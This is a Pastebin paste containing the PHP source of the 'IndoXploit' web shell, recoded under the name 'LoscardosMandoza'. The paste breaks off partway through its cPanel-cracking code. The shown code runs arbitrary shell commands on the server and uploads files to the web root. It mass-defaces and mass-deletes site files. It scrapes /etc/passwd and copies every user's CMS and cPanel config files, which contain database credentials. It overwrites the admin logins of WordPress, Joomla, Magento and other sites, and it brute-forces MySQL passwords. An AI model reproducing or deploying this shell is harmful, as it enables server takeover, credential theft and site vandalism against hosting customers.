Guest User

indoxploit shell recoded loscardos

a guest
Dec 2nd, 2016
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.07 KB | None | 0 0
  1. ?>
  2. <html>
  3. <head>
  4. <title>LoscardosMandoza</title>
  5. <meta name='author' content='IndoXploit'>
  6. <meta charset="UTF-8">
  7. <style type='text/css'>
  8. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  9. html {
  10. background: #000000;
  11. color: #FFFF00;
  12. font-family: 'Ubuntu';
  13. font-size: 13px;
  14. width: 100%;
  15. }
  16. li {
  17. display: inline;
  18. margin: 5px;
  19. padding: 5px;
  20. }
  21. table, th, td {
  22. border-collapse:collapse;
  23. font-family: Tahoma, Geneva, sans-serif;
  24. background: transparent;
  25. font-family: 'Ubuntu';
  26. font-size: 13px;
  27. }
  28. .table_home, .th_home, .td_home {
  29. border: 1px solid #000000;
  30. }
  31. th {
  32. padding: 10px;
  33. }
  34. a {
  35. color: #FFFF00;
  36. text-decoration: none;
  37. }
  38. a:hover {
  39. color: gold;
  40. text-decoration: underline;
  41. }
  42. b {
  43. color: gold;
  44. }
  45. input[type=text], input[type=password],input[type=submit] {
  46. background: transparent;
  47. color: #FFFF00;
  48. border: 1px solid #FFFF00;
  49. margin: 5px auto;
  50. padding-left: 5px;
  51. font-family: 'Ubuntu';
  52. font-size: 13px;
  53. }
  54. textarea {
  55. border: 1px solid #FFFF00;
  56. width: 100%;
  57. height: 400px;
  58. padding-left: 5px;
  59. margin: 10px auto;
  60. resize: none;
  61. background: transparent;
  62. color: #FFFF00;
  63. font-family: 'Ubuntu';
  64. font-size: 13px;
  65. }
  66. select {
  67. width: 152px;
  68. background: #0066FF;
  69. color: lime;
  70. border: 1px solid #FFFF00;
  71. margin: 5px auto;
  72. padding-left: 5px;
  73. font-family: 'Ubuntu';
  74. font-size: 13px;
  75. }
  76. option:hover {
  77. background: lime;
  78. color: #0066FF;
  79. }
  80. </style>
  81. </head>
  82. <?php
  83. function w($dir,$perm) {
  84. if(!is_writable($dir)) {
  85. return "<font color=red>".$perm."</font>";
  86. } else {
  87. return "<font color=lime>".$perm."</font>";
  88. }
  89. }
  90. function r($dir,$perm) {
  91. if(!is_readable($dir)) {
  92. return "<font color=red>".$perm."</font>";
  93. } else {
  94. return "<font color=lime>".$perm."</font>";
  95. }
  96. }
  97. function exe($cmd) {
  98. if(function_exists('system')) {
  99. @ob_start();
  100. @system($cmd);
  101. $buff = @ob_get_contents();
  102. @ob_end_clean();
  103. return $buff;
  104. } elseif(function_exists('exec')) {
  105. @exec($cmd,$results);
  106. $buff = "";
  107. foreach($results as $result) {
  108. $buff .= $result;
  109. } return $buff;
  110. } elseif(function_exists('passthru')) {
  111. @ob_start();
  112. @passthru($cmd);
  113. $buff = @ob_get_contents();
  114. @ob_end_clean();
  115. return $buff;
  116. } elseif(function_exists('shell_exec')) {
  117. $buff = @shell_exec($cmd);
  118. return $buff;
  119. }
  120. }
  121. function perms($file){
  122. $perms = fileperms($file);
  123. if (($perms & 0xC000) == 0xC000) {
  124. // Socket
  125. $info = 's';
  126. } elseif (($perms & 0xA000) == 0xA000) {
  127. // Symbolic Link
  128. $info = 'l';
  129. } elseif (($perms & 0x8000) == 0x8000) {
  130. // Regular
  131. $info = '-';
  132. } elseif (($perms & 0x6000) == 0x6000) {
  133. // Block special
  134. $info = 'b';
  135. } elseif (($perms & 0x4000) == 0x4000) {
  136. // Directory
  137. $info = 'd';
  138. } elseif (($perms & 0x2000) == 0x2000) {
  139. // Character special
  140. $info = 'c';
  141. } elseif (($perms & 0x1000) == 0x1000) {
  142. // FIFO pipe
  143. $info = 'p';
  144. } else {
  145. // Unknown
  146. $info = 'u';
  147. }
  148. // Owner
  149. $info .= (($perms & 0x0100) ? 'r' : '-');
  150. $info .= (($perms & 0x0080) ? 'w' : '-');
  151. $info .= (($perms & 0x0040) ?
  152. (($perms & 0x0800) ? 's' : 'x' ) :
  153. (($perms & 0x0800) ? 'S' : '-'));
  154. // Group
  155. $info .= (($perms & 0x0020) ? 'r' : '-');
  156. $info .= (($perms & 0x0010) ? 'w' : '-');
  157. $info .= (($perms & 0x0008) ?
  158. (($perms & 0x0400) ? 's' : 'x' ) :
  159. (($perms & 0x0400) ? 'S' : '-'));
  160. // World
  161. $info .= (($perms & 0x0004) ? 'r' : '-');
  162. $info .= (($perms & 0x0002) ? 'w' : '-');
  163. $info .= (($perms & 0x0001) ?
  164. (($perms & 0x0200) ? 't' : 'x' ) :
  165. (($perms & 0x0200) ? 'T' : '-'));
  166. return $info;
  167. }
  168. function hdd($s) {
  169. if($s >= 1073741824)
  170. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  171. elseif($s >= 1048576)
  172. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  173. elseif($s >= 1024)
  174. return sprintf('%1.2f',$s / 1024 ) .' KB';
  175. else
  176. return $s .' B';
  177. }
  178. function ambilKata($param, $kata1, $kata2){
  179. if(strpos($param, $kata1) === FALSE) return FALSE;
  180. if(strpos($param, $kata2) === FALSE) return FALSE;
  181. $start = strpos($param, $kata1) + strlen($kata1);
  182. $end = strpos($param, $kata2, $start);
  183. $return = substr($param, $start, $end - $start);
  184. return $return;
  185. }
  186. if(get_magic_quotes_gpc()) {
  187. function idx_ss($array) {
  188. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  189. }
  190. $_POST = idx_ss($_POST);
  191. }
  192.  
  193. error_reporting(0);
  194. @ini_set('error_log',NULL);
  195. @ini_set('log_errors',0);
  196. @ini_set('max_execution_time',0);
  197. @set_time_limit(0);
  198. @set_magic_quotes_runtime(0);
  199. if(isset($_GET['dir'])) {
  200. $dir = $_GET['dir'];
  201. chdir($dir);
  202. } else {
  203. $dir = getcwd();
  204. }
  205. $dir = str_replace("\\","/",$dir);
  206. $scdir = explode("/", $dir);
  207. $freespace = hdd(disk_free_space("/"));
  208. $total = hdd(disk_total_space("/"));
  209. $used = $total - $freespace;
  210. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  211. $ds = @ini_get("disable_functions");
  212. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  213. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  214. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  215. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  216. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  217. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  218. if(!function_exists('posix_getegid')) {
  219. $user = @get_current_user();
  220. $uid = @getmyuid();
  221. $gid = @getmygid();
  222. $group = "?";
  223. } else {
  224. $uid = @posix_getpwuid(posix_geteuid());
  225. $gid = @posix_getgrgid(posix_getegid());
  226. $user = $uid['name'];
  227. $uid = $uid['uid'];
  228. $group = $gid['name'];
  229. $gid = $gid['gid'];
  230. }
  231. echo "System: <font color=lime>".php_uname()."</font><br>";
  232. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  233. echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  234. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  235. echo "Safe Mode: $sm<br>";
  236. echo "Disable Functions: $show_ds<br>";
  237. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  238. echo "Current DIR: ";
  239. foreach($scdir as $c_dir => $cdir) {
  240. echo "<a href='?dir=";
  241. for($i = 0; $i <= $c_dir; $i++) {
  242. echo $scdir[$i];
  243. if($i != $c_dir) {
  244. echo "/";
  245. }
  246. }
  247. echo "'>$cdir</a>/";
  248. }
  249. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  250. echo "<hr>";
  251. echo "<center>";
  252. echo "<ul>";
  253. echo "<li>[ <a href='?'>Home</a> ]</li>";
  254. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  255. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  256. echo "<li>[<a href='?dir=$dir&do=csrfup'>CSRF Exploiter</a>]</li>";
  257. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  258. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  259. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  260. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  261. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  262. echo "<li>[ <a href='?dir=$dir&do=tools'>Tools</a>]</li>";
  263. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  264. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  265. echo "<li>[<a href='?dir=$dir&do=defacerid'>Defacer.ID</a>]</li>";
  266. echo "<li><br>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  267. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  268. echo "</ul>";
  269. echo "</center>";
  270. echo "<hr>";
  271. if($_GET['do'] == 'upload') {
  272. echo "<center>";
  273. if($_POST['upload']) {
  274. if($_POST['tipe_upload'] == 'biasa') {
  275. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  276. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  277. } else {
  278. $act = "<font color=red>failed to upload file</font>";
  279. }
  280. } else {
  281. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  282. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  283. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  284. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  285. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  286. } else {
  287. $act = "<font color=red>failed to upload file</font>";
  288. }
  289. } else {
  290. $act = "<font color=red>failed to upload file</font>";
  291. }
  292. }
  293. }
  294. echo "Upload File:
  295. <form method='post' enctype='multipart/form-data'>
  296. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  297. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  298. <input type='file' name='ix_file'>
  299. <input type='submit' value='upload' name='upload'>
  300. </form>";
  301. echo $act;
  302. echo "</center>";
  303. } elseif($_GET['do'] == 'mass_deface') {
  304. function sabun_massal($dir,$namafile,$isi_script) {
  305. if(is_writable($dir)) {
  306. $dira = scandir($dir);
  307. foreach($dira as $dirb) {
  308. $dirc = "$dir/$dirb";
  309. $lokasi = $dirc.'/'.$namafile;
  310. if($dirb === '.') {
  311. file_put_contents($lokasi, $isi_script);
  312. } elseif($dirb === '..') {
  313. file_put_contents($lokasi, $isi_script);
  314. } else {
  315. if(is_dir($dirc)) {
  316. if(is_writable($dirc)) {
  317. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  318. file_put_contents($lokasi, $isi_script);
  319. $idx = sabun_massal($dirc,$namafile,$isi_script);
  320. }
  321. }
  322. }
  323. }
  324. }
  325. }
  326. function sabun_biasa($dir,$namafile,$isi_script) {
  327. if(is_writable($dir)) {
  328. $dira = scandir($dir);
  329. foreach($dira as $dirb) {
  330. $dirc = "$dir/$dirb";
  331. $lokasi = $dirc.'/'.$namafile;
  332. if($dirb === '.') {
  333. file_put_contents($lokasi, $isi_script);
  334. } elseif($dirb === '..') {
  335. file_put_contents($lokasi, $isi_script);
  336. } else {
  337. if(is_dir($dirc)) {
  338. if(is_writable($dirc)) {
  339. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  340. file_put_contents($lokasi, $isi_script);
  341. }
  342. }
  343. }
  344. }
  345. }
  346. }
  347. if($_POST['start']) {
  348. if($_POST['tipe_sabun'] == 'mahal') {
  349. echo "<div style='margin: 5px auto; padding: 5px'>";
  350. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  351. echo "</div>";
  352. } elseif($_POST['tipe_sabun'] == 'murah') {
  353. echo "<div style='margin: 5px auto; padding: 5px'>";
  354. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  355. echo "</div>";
  356. }
  357. } else {
  358. echo "<center>";
  359. echo "<form method='post'>
  360. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  361. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  362. <font style='text-decoration: underline;'>Folder:</font><br>
  363. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  364. <font style='text-decoration: underline;'>Filename:</font><br>
  365. <input type='text' name='d_file' value='xai.php' style='width: 450px;' height='10'><br>
  366. <font style='text-decoration: underline;'>Index File:</font><br>
  367. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Indonesian People -XaiSyndicate</textarea><br>
  368. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  369. </form></center>";
  370. }
  371. } elseif($_GET['do'] == 'mass_delete') {
  372. function hapus_massal($dir,$namafile) {
  373. if(is_writable($dir)) {
  374. $dira = scandir($dir);
  375. foreach($dira as $dirb) {
  376. $dirc = "$dir/$dirb";
  377. $lokasi = $dirc.'/'.$namafile;
  378. if($dirb === '.') {
  379. if(file_exists("$dir/$namafile")) {
  380. unlink("$dir/$namafile");
  381. }
  382. } elseif($dirb === '..') {
  383. if(file_exists("".dirname($dir)."/$namafile")) {
  384. unlink("".dirname($dir)."/$namafile");
  385. }
  386. } else {
  387. if(is_dir($dirc)) {
  388. if(is_writable($dirc)) {
  389. if(file_exists($lokasi)) {
  390. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  391. unlink($lokasi);
  392. $idx = hapus_massal($dirc,$namafile);
  393. }
  394. }
  395. }
  396. }
  397. }
  398. }
  399. }
  400. if($_POST['start']) {
  401. echo "<div style='margin: 5px auto; padding: 5px'>";
  402. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  403. echo "</div>";
  404. } else {
  405. echo "<center>";
  406. echo "<form method='post'>
  407. <font style='text-decoration: underline;'>Folder:</font><br>
  408. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  409. <font style='text-decoration: underline;'>Filename:</font><br>
  410. <input type='text' name='d_file' value='xai.php' style='width: 450px;' height='10'><br>
  411. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  412. </form></center>";
  413. }
  414. } elseif($_GET['do'] == 'config') {
  415. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  416. $idx = mkdir("idx_config", 0777);
  417. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  418. $htc = fopen("idx_config/.htaccess","w");
  419. fwrite($htc, $isi_htc);
  420. while($passwd = fgets($etc)) {
  421. if($passwd == "" || !$etc) {
  422. echo "<font color=red>Can't read /etc/passwd</font>";
  423. } else {
  424. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  425. foreach($user_config[1] as $user_idx) {
  426. $user_config_dir = "/home/$user_idx/public_html/";
  427. if(is_readable($user_config_dir)) {
  428. $grab_config = array(
  429. "/home/$user_idx/.my.cnf" => "cpanel",
  430. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  431. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  432. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  433. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  434. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  435. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  436. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  437. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  438. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  439. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  440. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  441. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  442. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  443. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  444. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  445. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  446. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  447. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  448. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  449. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  450. foreach($grab_config as $config => $nama_config) {
  451. $ambil_config = file_get_contents($config);
  452. if($ambil_config == '') {
  453. } else {
  454. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  455. fputs($file_config,$ambil_config);
  456. }
  457. }
  458. }
  459. }
  460. }
  461. }
  462. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  463. } elseif($_GET['do'] == 'jumping') {
  464. $i = 0;
  465. echo "<pre><div class='margin: 5px auto;'>";
  466. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  467. while($passwd = fgets($etc)) {
  468. if($passwd == '' || !$etc) {
  469. echo "<font color=red>Can't read /etc/passwd</font>";
  470. } else {
  471. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  472. foreach($user_jumping[1] as $user_idx_jump) {
  473. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  474. if(is_readable($user_jumping_dir)) {
  475. $i++;
  476. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  477. if(is_writable($user_jumping_dir)) {
  478. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  479. }
  480. echo $jrw;
  481. if(function_exists('posix_getpwuid')) {
  482. $domain_jump = file_get_contents("/etc/named.conf");
  483. if($domain_jump == '') {
  484. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  485. } else {
  486. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  487. foreach($domains_jump[1] as $dj) {
  488. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  489. $user_jumping_url = $user_jumping_url['name'];
  490. if($user_jumping_url == $user_idx_jump) {
  491. echo " => ( <u>$dj</u> )<br>";
  492. break;
  493. }
  494. }
  495. }
  496. } else {
  497. echo "<br>";
  498. }
  499. }
  500. }
  501. }
  502. }
  503. if($i == 0) {
  504. } else {
  505. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  506. }
  507. echo "</div></pre>";
  508. } elseif($_GET['do'] == 'auto_edit_user') {
  509. if($_POST['hajar']) {
  510. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  511. echo "username atau password harus lebih dari 6 karakter";
  512. } else {
  513. $user_baru = $_POST['user_baru'];
  514. $pass_baru = md5($_POST['pass_baru']);
  515. $conf = $_POST['config_dir'];
  516. $scan_conf = scandir($conf);
  517. foreach($scan_conf as $file_conf) {
  518. if(!is_file("$conf/$file_conf")) continue;
  519. $config = file_get_contents("$conf/$file_conf");
  520. if(preg_match("/JConfig|joomla/",$config)) {
  521. $dbhost = ambilkata($config,"host = '","'");
  522. $dbuser = ambilkata($config,"user = '","'");
  523. $dbpass = ambilkata($config,"password = '","'");
  524. $dbname = ambilkata($config,"db = '","'");
  525. $dbprefix = ambilkata($config,"dbprefix = '","'");
  526. $prefix = $dbprefix."users";
  527. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  528. $db = mysql_select_db($dbname);
  529. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  530. $result = mysql_fetch_array($q);
  531. $id = $result['id'];
  532. $site = ambilkata($config,"sitename = '","'");
  533. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  534. echo "Config => ".$file_conf."<br>";
  535. echo "CMS => Joomla<br>";
  536. if($site == '') {
  537. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  538. } else {
  539. echo "Sitename => $site<br>";
  540. }
  541. if(!$update OR !$conn OR !$db) {
  542. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  543. } else {
  544. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  545. }
  546. mysql_close($conn);
  547. } elseif(preg_match("/WordPress/",$config)) {
  548. $dbhost = ambilkata($config,"DB_HOST', '","'");
  549. $dbuser = ambilkata($config,"DB_USER', '","'");
  550. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  551. $dbname = ambilkata($config,"DB_NAME', '","'");
  552. $dbprefix = ambilkata($config,"table_prefix = '","'");
  553. $prefix = $dbprefix."users";
  554. $option = $dbprefix."options";
  555. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  556. $db = mysql_select_db($dbname);
  557. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  558. $result = mysql_fetch_array($q);
  559. $id = $result[ID];
  560. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  561. $result2 = mysql_fetch_array($q2);
  562. $target = $result2[option_value];
  563. if($target == '') {
  564. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  565. } else {
  566. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  567. }
  568. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  569. echo "Config => ".$file_conf."<br>";
  570. echo "CMS => Wordpress<br>";
  571. echo $url_target;
  572. if(!$update OR !$conn OR !$db) {
  573. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  574. } else {
  575. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  576. }
  577. mysql_close($conn);
  578. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  579. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  580. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  581. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  582. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  583. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  584. $prefix = $dbprefix."admin_user";
  585. $option = $dbprefix."core_config_data";
  586. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  587. $db = mysql_select_db($dbname);
  588. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  589. $result = mysql_fetch_array($q);
  590. $id = $result[user_id];
  591. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  592. $result2 = mysql_fetch_array($q2);
  593. $target = $result2[value];
  594. if($target == '') {
  595. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  596. } else {
  597. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  598. }
  599. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  600. echo "Config => ".$file_conf."<br>";
  601. echo "CMS => Magento<br>";
  602. echo $url_target;
  603. if(!$update OR !$conn OR !$db) {
  604. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  605. } else {
  606. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  607. }
  608. mysql_close($conn);
  609. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  610. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  611. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  612. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  613. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  614. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  615. $prefix = $dbprefix."user";
  616. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  617. $db = mysql_select_db($dbname);
  618. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  619. $result = mysql_fetch_array($q);
  620. $id = $result[user_id];
  621. $target = ambilkata($config,"HTTP_SERVER', '","'");
  622. if($target == '') {
  623. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  624. } else {
  625. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  626. }
  627. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  628. echo "Config => ".$file_conf."<br>";
  629. echo "CMS => OpenCart<br>";
  630. echo $url_target;
  631. if(!$update OR !$conn OR !$db) {
  632. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  633. } else {
  634. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  635. }
  636. mysql_close($conn);
  637. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  638. $dbhost = ambilkata($config,'server = "','"');
  639. $dbuser = ambilkata($config,'username = "','"');
  640. $dbpass = ambilkata($config,'password = "','"');
  641. $dbname = ambilkata($config,'database = "','"');
  642. $prefix = "users";
  643. $option = "identitas";
  644. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  645. $db = mysql_select_db($dbname);
  646. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  647. $result = mysql_fetch_array($q);
  648. $target = $result[alamat_website];
  649. if($target == '') {
  650. $target2 = $result[url];
  651. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  652. if($target2 == '') {
  653. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  654. } else {
  655. $cek_login3 = file_get_contents("$target2/adminweb/");
  656. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  657. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  658. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  659. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  660. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  661. } else {
  662. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  663. }
  664. }
  665. } else {
  666. $cek_login = file_get_contents("$target/adminweb/");
  667. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  668. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  669. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  670. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  671. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  672. } else {
  673. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  674. }
  675. }
  676. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  677. echo "Config => ".$file_conf."<br>";
  678. echo "CMS => Lokomedia<br>";
  679. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  680. echo $url_target2;
  681. } else {
  682. echo $url_target;
  683. }
  684. if(!$update OR !$conn OR !$db) {
  685. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  686. } else {
  687. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  688. }
  689. mysql_close($conn);
  690. }
  691. }
  692. }
  693. } else {
  694. echo "<center>
  695. <h1>Auto Edit User Config</h1>
  696. <form method='post'>
  697. DIR Config: <br>
  698. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  699. Set User & Pass: <br>
  700. <input type='text' name='user_baru' value='syndicate' placeholder='user_baru'><br>
  701. <input type='text' name='pass_baru' value='loscardos' placeholder='pass_baru'><br>
  702. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  703. </form>
  704. </span><br>
  705. ";
  706. }
  707. } elseif($_GET['do'] == 'cpanel') {
  708. if($_POST['crack']) {
  709. $usercp = explode("\r\n", $_POST['user_cp']);
  710. $passcp = explode("\r\n", $_POST['pass_cp']);
  711. $i = 0;
  712. foreach($usercp as $ucp) {
  713. foreach($passcp as $pcp) {
  714. if(@mysql_connect('localhost', $ucp, $pcp)) {
  715. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  716. } else {
  717. $_SESSION[$ucp] = "1";
  718. $_SESSION[$pcp] = "1";
  719. if($ucp == '' || $pcp == '') {
  720.  
  721. } else {
  722. $i++;
  723. if(function_exists('posix_getpwuid')) {
